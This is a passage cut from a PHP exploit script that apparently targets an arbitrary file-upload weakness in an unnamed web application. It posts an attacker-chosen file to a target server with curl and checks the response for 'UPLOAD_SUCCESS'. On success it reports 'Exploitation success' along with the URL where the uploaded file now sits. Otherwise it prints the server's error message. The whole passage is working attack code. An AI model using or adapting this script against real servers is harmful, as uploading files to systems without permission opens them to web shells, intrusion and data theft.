"@".$options['f']."","fileId" => $options["f"])); $result = curl_exec($handle); if(strpos($result,"UPLOAD_SUCCESS")){ echo "\n_____________________________________________________________________\n"; echo "\t[+] Exploitation success!!\n"; echo "\t[+] http://$options[u]/files/$options[f]\n"; echo "_____________________________________________________________________\n"; }else{ echo "\n[-] Target is not exploitable\n"; preg_match('#msg="(.*?)" />#si',$result,$msg); echo "[-] Message: ".$msg[1]."\n"; } ?>